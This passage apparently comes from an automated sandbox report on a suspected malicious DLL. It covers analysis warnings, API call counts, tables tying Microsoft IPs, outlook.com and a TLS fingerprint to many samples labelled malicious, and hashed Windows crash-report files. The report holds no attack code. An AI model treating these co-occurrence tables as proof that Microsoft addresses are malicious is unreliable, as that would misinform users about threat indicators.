onedsblobprdeus17.eastus.cloudapp.azure.com, blobcollector.events.data.trafficmanager.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found
• Report size getting too big, too many NtProtectVirtualMemory calls found
• Report size getting too big, too many NtQueryValueKey calls found
• VT rate limit hit for: /opt/package/joesandbox/database/analysis/500399/sample/m87xfb63XU.dll

Simulations

Behavior and APIs

Time      Type             Description
00:22:43  API Interceptor  7x Sleep call for process: rundll32.exe modified
00:23:01  API Interceptor  6x Sleep call for process: loaddll32.exe modified
00:23:05  API Interceptor  3x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match         Associated Sample Name / URL          Detection  Context
40.97.161.50  6yDD19jMIu.dll                        malicious
              6yDD19jMIu.dll                        malicious
              B6VQd36tt6.dll                        malicious
              test1.dll                             malicious
              6.dll                                 malicious
              6101135878f66.dll                     malicious
              a9FUs89dWy.dll                        malicious
              609a460e94791.tiff.dll                malicious
              13fil.exe                             malicious
              24messag.exe                          malicious
              .exe                                  malicious
              .exe                                  malicious
              66documen.exe                         malicious
              9messag.exe                           malicious
13.82.28.61   45DOC00111738011537818635391-pdf.exe  malicious  msn.com/

Domains

Match        Associated Sample Name / URL                      Detection  Context
outlook.com  P2AN3Yrtnz.exe                                    malicious  40.93.212.0
             Hm7d40tE44.exe                                    malicious  104.47.53.36
             SecuriteInfo.com.W32.AIDetect.malware2.21009.exe  malicious  104.47.53.36
             in7BcpKNoa.exe                                    malicious  40.93.212.0
             aXNdDIO708.exe                                    malicious  104.47.53.36
             vhPaw5lCuv.exe                                    malicious  40.93.212.0
             5sTWnI5RoC.exe                                    malicious  40.93.207.0
             57wF9hu0V5.exe                                    malicious  40.93.207.0
             7zxmUw3Ml1.exe                                    malicious  104.47.53.36
             Nh1UI4PFGW.exe                                    malicious  52.101.24.0
             rEYF2xcbGR.exe                                    malicious  40.93.207.1
             G2Shy4flZe.exe                                    malicious  40.93.207.1
             2nqVnWlyLp.exe                                    malicious  52.101.24.0
             nFkQ33d7Ec.exe                                    malicious  104.47.53.36
             QE66HWdeTM.exe                                    malicious  40.93.207.0

ASN

Match: MICROSOFT-CORP-MSN-AS-BLOCKUS
Associated Sample Name / URL | SHA 256 | Detection | Link | Context
6yDD19jMIu.dll | Get hash | malicious | Browse | 13.82.28.61
6yDD19jMIu.dll | Get hash | malicious | Browse | 13.82.28.61
B6VQd36tt6.dll | Get hash | malicious | Browse | 13.82.28.61
B6VQd36tt6.dll | Get hash | malicious | Browse | 52.97.183.162
P2AN3Yrtnz.exe | Get hash | malicious | Browse | 40.93.212.0
b3astmode.x86 | Get hash | malicious | Browse | 72.154.237.78
b3astmode.arm7 | Get hash | malicious | Browse | 20.153.181.154
b3astmode.arm7-20211011-1850 | Get hash | malicious | Browse | 20.63.129.213
TNIZtb3HS3.exe | Get hash | malicious | Browse | 20.42.65.92
PROFORMA INVOICE -PI6120..html | Get hash | malicious | Browse | 40.101.62.34
setup_x86_x64_install.exe | Get hash | malicious | Browse | 52.168.117.173
ntpclient | Get hash | malicious | Browse | 21.215.78.72
2021catalog-selected products.xlsm | Get hash | malicious | Browse | 13.92.100.208
K6E9636Koq | Get hash | malicious | Browse | 159.27.209.248
setup_x86_x64_install.exe | Get hash | malicious | Browse | 20.42.73.29
Hm7d40tE44.exe | Get hash | malicious | Browse | 104.47.53.36
mixsix_20211008-150045.exe | Get hash | malicious | Browse | 20.189.173.22
SecuriteInfo.com.W32.AIDetect.malware2.21009.exe | Get hash | malicious | Browse | 104.47.53.36
in7BcpKNoa.exe | Get hash | malicious | Browse | 40.93.212.0
xiaomi-home.apk | Get hash | malicious | Browse | 104.45.180.93

JA3 Fingerprints

Match: ce5f3254611a8c095a3d821d44539877
Associated Sample Name / URL | SHA 256 | Detection | Link | Context
6yDD19jMIu.dll | Get hash | malicious | Browse | 52.97.151.2, 52.97.151.82, 40.97.161.50, 13.82.28.61, 40.101.60.226, 52.97.151.66
6yDD19jMIu.dll | Get hash | malicious | Browse | 52.97.151.2, 52.97.151.82, 40.97.161.50, 13.82.28.61, 40.101.60.226, 52.97.151.66
B6VQd36tt6.dll | Get hash | malicious | Browse | 52.97.151.2, 52.97.151.82, 40.97.161.50, 13.82.28.61, 40.101.60.226, 52.97.151.66
B6VQd36tt6.dll | Get hash | malicious | Browse | 52.97.151.2, 52.97.151.82, 40.97.161.50, 13.82.28.61, 40.101.60.226, 52.97.151.66
setup_x86_x64_install.exe | Get hash | malicious | Browse | 52.97.151.2, 52.97.151.82, 40.97.161.50, 13.82.28.61, 40.101.60.226, 52.97.151.66
aVFOmbW2t7.dll | Get hash | malicious | Browse | 52.97.151.2, 52.97.151.82, 40.97.161.50, 13.82.28.61, 40.101.60.226, 52.97.151.66
gxJ83rJkgw.msi | Get hash | malicious | Browse | 52.97.151.2, 52.97.151.82, 40.97.161.50, 13.82.28.61, 40.101.60.226, 52.97.151.66
yR4AxlwcWJ.exe | Get hash | malicious | Browse | 52.97.151.2, 52.97.151.82, 40.97.161.50, 13.82.28.61, 40.101.60.226, 52.97.151.66
BsyK7FB5DQ.exe | Get hash | malicious | Browse | 52.97.151.2, 52.97.151.82, 40.97.161.50, 13.82.28.61, 40.101.60.226, 52.97.151.66
SGfGZT66wD.exe | Get hash | malicious | Browse | 52.97.151.2, 52.97.151.82, 40.97.161.50, 13.82.28.61, 40.101.60.226, 52.97.151.66
uT9rwkGATJ.dll | Get hash | malicious | Browse | 52.97.151.2, 52.97.151.82, 40.97.161.50, 13.82.28.61, 40.101.60.226, 52.97.151.66
XK1PLPuwjL.exe | Get hash | malicious | Browse | 52.97.151.2, 52.97.151.82, 40.97.161.50, 13.82.28.61, 40.101.60.226, 52.97.151.66
pHEiqE9toa.msi | Get hash | malicious | Browse | 52.97.151.2, 52.97.151.82, 40.97.161.50, 13.82.28.61, 40.101.60.226, 52.97.151.66
SecuriteInfo.com.W32.AIDetect.malware2.24481.exe | Get hash | malicious | Browse | 52.97.151.2, 52.97.151.82, 40.97.161.50, 13.82.28.61, 40.101.60.226, 52.97.151.66
vH0SHswvrb.exe | Get hash | malicious | Browse | 52.97.151.2, 52.97.151.82, 40.97.161.50, 13.82.28.61, 40.101.60.226, 52.97.151.66
NM0NyvZi8O.exe | Get hash | malicious | Browse | 52.97.151.2, 52.97.151.82, 40.97.161.50, 13.82.28.61, 40.101.60.226, 52.97.151.66
yOTzv1Qz0n.exe | Get hash | malicious | Browse | 52.97.151.2, 52.97.151.82, 40.97.161.50, 13.82.28.61, 40.101.60.226, 52.97.151.66
SWaTAV7EdD.exe | Get hash | malicious | Browse | 52.97.151.2, 52.97.151.82, 40.97.161.50, 13.82.28.61, 40.101.60.226, 52.97.151.66
SKMC07102021.exe | Get hash | malicious | Browse | 52.97.151.2, 52.97.151.82, 40.97.161.50, 13.82.28.61, 40.101.60.226, 52.97.151.66
50r72IVfM0.msi | Get hash | malicious | Browse | 52.97.151.2, 52.97.151.82, 40.97.161.50, 13.82.28.61, 40.101.60.226, 52.97.151.66

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_58e47b16956767aaab6459884ff9566934c5f_82810a17_0f1ef54e\Report.wer
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Little-endian UTF-16 Unicode text, with CRLF line terminators
Category: dropped
Size (bytes): 12044
Entropy (8bit): 3.7648173180737223
Encrypted: false
SSDEEP: 192:WOiJ0oXmHBUZMX4jed+x/u7sIS274It7cZ:vinXeBUZMX4je8/u7sIX4It7cZ
MD5: 00D3104647D7AA9C89A29A39C8E5F23D
SHA1: DD67D84E444154EE04A2F78460292E06988680E0
SHA-256: 494E940DB53BF67EFC4DB475B8C4007BC6274B349F26C449F700FF0831C8FF15
SHA-512: 853D3F432CDA15CC531F2352AB192DF4EB55672D3BB3CE831D36F16EE4624DD7103269826EF4D850E213C6D10749660C6187DCFD4DB7A085EEEA435E138D4D88
Malicious: false
Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.8.4.9.6.9.7.4.6.5.2.7.8.2.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.8.4.9.6.9.8.7.9.9.8.4.7.0.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.d.6.e.5.5.0.2.-.6.2.d.e.-.4.2.b.b.-.a.e.2.3.-.a.a.e.f.8.9.1.a.5.5.9.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.a.a.e.a.0.8.8.-.c.8.0.f.-.4.6.7.d.-.b.8.0.a.-.0.6.a.8.c.8.6.1.b.4.a.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.1.8.-.0.0.0.1.-.0.0.1.c.-.1.9.7.c.-.0.1.b.4.3.9.b.f.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_58e47b16956767aaab6459884ff9566934c5f_82810a17_19a35deb\Report.wer
Process: C:\Windows\SysWOW64\WerFault.exe
File Type: Little-endian UTF-16 Unicode text, with CRLF line terminators
Category: dropped
Size (bytes): 12042
Entropy (8bit): 3.7643918212913916
Encrypted: false
SSDEEP: 192:PfiK0oXeHBUZMX4jed+x/u7slS274It7cC:XicXWBUZMX4jec/u7slX4It7cC
MD5: CB8C1162189141C8D0620A9063BB666C
SHA1: D3CA28C63DDA153B6D9EF4987F6B043D2E5B8357
SHA-256: 4BE2E5996C3969D33E6ABAC03911052218171F4B7ECD023D5DC2C4D4C5995D96
SHA-512: 2E9F16738E0B9F9C1A0FEE9D39335A81EFB28CC5F9A5EA27674907B227B05B6995EA01D2CA3692A48E7B4359717C28F7113FBAD38F85F5EA8F94262A6EFAE069
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.8.4.9.6.9.7.1.3.4.3.1.4.0.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.8.4.9.6.9.8.3.8.5.1.5.2.7.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.8.d.d.6.0.4.e.-.e.6.c.9.-.4.c.6.e.-.b.d.f.e.-.7.b.9.7.3.d.8.6.f.9.b.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.b.3.9.9.5.c.d.-.0.2.e.c.-.4.a.4.d.-.8.0.2.b.-.9.b.7.a.2.6.7.8.0.b.6.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.1.a.8.-.0.0.0.1.-.0.0.1.c.-.c.d.2.5.-.7.3.a.f.3.9.b.f.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.
                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_7dd26a4e42a9ea9789d8aeb01848b51c1493e55_82810a17_14578029\Report.wer
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):12042
                                                                                                                                  Entropy (8bit):3.763797961621953
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:WhiF0oXaHKUgO+SQsjed+x/u7slS274It7c5:ciLXyKUgO+SQsje8/u7slX4It7c5
                                                                                                                                  MD5:40B6A8CBA1D2905400E1254929C70D50
                                                                                                                                  SHA1:3C0622CCC3FBCDD3880325B3C6613095E852F030
                                                                                                                                  SHA-256:2A62F6CF1EE2B61A4D275248936C5DFC9024157FDC8CE9C623E0225123E059FB
                                                                                                                                  SHA-512:3B6982E95890F97800B9AC04A27312BA4D3D90C6F3EA6A265CA7960BC238FE647EC88ED8DA66517C24DC5B5B2AA4EEFC083E1DCBEFC1C581FB55E9B09F68AD71
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.8.4.9.6.9.8.5.6.1.5.9.0.7.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.8.4.9.6.9.9.3.4.6.9.4.0.9.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.d.a.e.8.4.e.3.-.d.4.8.f.-.4.c.3.e.-.a.0.f.1.-.8.8.c.c.1.3.c.a.8.2.e.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.6.a.b.2.3.7.4.-.9.2.a.b.-.4.5.d.5.-.a.e.e.4.-.e.9.f.c.e.3.3.4.6.8.6.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.2.8.-.0.0.0.1.-.0.0.1.c.-.1.f.1.a.-.6.f.b.1.3.9.b.f.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.
                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERAFBA.tmp.dmp
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:Mini DuMP crash report, 15 streams, Tue Oct 12 07:22:54 2021, 0x1205a4 type
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):34942
                                                                                                                                  Entropy (8bit):2.4371667427565704
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:oTdPExlXjMCQ1IDZc1qbND3z4aQwnCHOv4lX8G:/FQCQac1E3UaQwj4lz
                                                                                                                                  MD5:FD984E1914EC2F5D330FBDED764088F8
                                                                                                                                  SHA1:3D6F67ED6643C12253DE73C23904C772A2377380
                                                                                                                                  SHA-256:5B44DC06C22BEE12F94FF2DC9F48899F7DA462764534A55BA0772C731D18E3AE
                                                                                                                                  SHA-512:5D9EC660DDA7BF5FBACE1C8A337F89F2B08A27CB0A6498674E084E867481C0EC89A610248077357EB8C37AC5EE9F3708D58568DB8FFB6DB88ACFDCD3BDC44AD1
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: MDMP....... ........7ea...................U...........B..............GenuineIntelW...........T...........R7ea"............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERBC9B.tmp.dmp
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:Mini DuMP crash report, 15 streams, Tue Oct 12 07:23:03 2021, 0x1205a4 type
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):35266
                                                                                                                                  Entropy (8bit):2.375122475405865
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:IIFVNBmoRklXjMCQ1IDZcWqB6tt4lMb4kTYo82:9B2QCQacWJt6lMDbP
                                                                                                                                  MD5:74BEE0FAD6A4C982C6508E8EC4B63E72
                                                                                                                                  SHA1:DC40D3ACADD2ED57D715D78D583AFAD0315A2999
                                                                                                                                  SHA-256:2AAEFF347370B9C75FA33E4D261272382A08124C11B1C737D046ED13FE39F744
                                                                                                                                  SHA-512:4AD02B32D0CD585DED820105641EBD2538F3A45FC14CA5ED48E943B73BD422791FBD486899ACDDABFB0C4A047025CF611F99C6411630C5B95F427A82591F1E6F
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: MDMP....... ........7ea...................U...........B..............GenuineIntelW...........T...........Z7ea!............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERBDA5.tmp.WERInternalMetadata.xml
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):8410
                                                                                                                                  Entropy (8bit):3.6994283201386104
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:Rrl7r3GLNi2c6fw6YoS6yVt33Qgmf8NSkCprM89b+Asf4qm:RrlsNi96Y6YN6yVt33Qgmf8NSF+Tfk
                                                                                                                                  MD5:83B27B3137004DE49BF0D594ACF580DF
                                                                                                                                  SHA1:978D213E573BD27560CB9FFA56856C23B26258C7
                                                                                                                                  SHA-256:7A5F0D8F95F84C7C555784AF4444D1A36D487A3C0FF81A016B462AAD055C4E3F
                                                                                                                                  SHA-512:FB18C99471308C16F34AB0E18F6C85C7013BC5F9862DCB40E13A83DC45D4AD7E1E859251A777CC7790A3DD1ABF3CB2D3E873A75D5FF519AB6669550B11E47921
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.5.2.0.<./.P.i.d.>.......
                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERC1EC.tmp.xml
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):4771
                                                                                                                                  Entropy (8bit):4.4851490486417
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:cvIwSD8zs1JgtWI9J1WSC8Bw8fm8M4JCdsPMFVho+q8vjsPJj4SrSchd:uITfPCESNHJdwWKmJjDW4d
                                                                                                                                  MD5:184F4DEE9908C2C8BBC88B76727AA2D3
                                                                                                                                  SHA1:15E5EA4956686C4B0ACC8AB55D7517EEA4A466F1
                                                                                                                                  SHA-256:22B58501E81654B15E3536A9BBA37C36007046AA0024FE02FEC764CE3C2411CB
                                                                                                                                  SHA-512:0E7E11D9524AEC5ACE5DDFB1E69C74A888DA314279A5FD8A1E37D02FDEFDAABAAD38BF70D27BA0B2A8967CAE8E10140EDF12EF5B9D1E9C9D64993D7581BC5287
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1206273" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERE198.tmp.WERInternalMetadata.xml
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):8410
                                                                                                                                  Entropy (8bit):3.6983516689249325
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:Rrl7r3GLNi/Q6uE6YoM6AIcgmf8NSkCprK89bDxsfHBm:RrlsNio6uE6YT6Argmf8NSPDqfc
                                                                                                                                  MD5:1847F7A24426FD647D0FF897B4245F96
                                                                                                                                  SHA1:E4D20ACCF82E7281D7B47DBCB12378E25141B4CD
                                                                                                                                  SHA-256:C0295B80D920E451694C4EB4700567CECB1FF12F590DA8CC27B4C336EC7782EE
                                                                                                                                  SHA-512:680EF4121B851474F4A76302D99B60A716FD5E846BC19C4F0B53431B6BF40853F74118023061A373950FC41FF9930BAB9403B95B3BD79C9A010C59C8B8AF2CAB
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.3.6.<./.P.i.d.>.......
                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERE773.tmp.dmp
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:Mini DuMP crash report, 15 streams, Tue Oct 12 07:23:09 2021, 0x1205a4 type
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):33278
                                                                                                                                  Entropy (8bit):2.4120363619214022
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:192:5MFvpC6fFXjMCQ1IDZc+qBF+PsIyQQGDTxlD:ivs6flQCQac+ZyKd9
                                                                                                                                  MD5:B2A646652F90E60B0A481B1BBA023237
                                                                                                                                  SHA1:10CE544E74E20CC967895E0AD9C0400190DEF800
                                                                                                                                  SHA-256:E4690AAABE533E407B2E35CC78D2225810EFE97102DDFB13B772F8419AAA932B
                                                                                                                                  SHA-512:17B57F6BCA5D32D83C52C51C7057A33F17550D0CF53828437726E30B6DFA736B13AEEA8F3AE1227FEC08C47AC4B52B2E2EA9A9565AE690C19D9E4E6247636818
                                                                                                                                  Malicious:false
                                                                                                                                  Preview: MDMP....... ........7ea...................U...........B..............GenuineIntelW...........T.......(...V7ea"............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERE7A4.tmp.xml
                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                  Category:dropped
                                                                                                                                  Size (bytes):4771
                                                                                                                                  Entropy (8bit):4.48311449717304
                                                                                                                                  Encrypted:false
                                                                                                                                  SSDEEP:48:cvIwSD8zs1JgtWI9J1WSC8BX8fm8M4JCdsPMFK+q8vjsPps4SrSqd:uITfPCESNyJdvKmWDWqd
                                                                                                                                  MD5:5F9D3CFE40E9649972B503B7377A466D
                                                                                                                                  SHA1:FB046C647BF08B697DA3291998A0712AEA733140
                                                                                                                                  SHA-256:10A8E4A4D2FD4A0CDF212DABD557A63512C1FFAD220F441D934C771AD23CB20D
                                                                                                                                  SHA-512:72CA94891BC7A5A98BD387FA1CDF4BCAF9C14813AC4A7D3E0F70658A7E21866B3DB54F2A13533581EC522F3425F6CF472A8493CA292533E4DE0A07F090C6C802
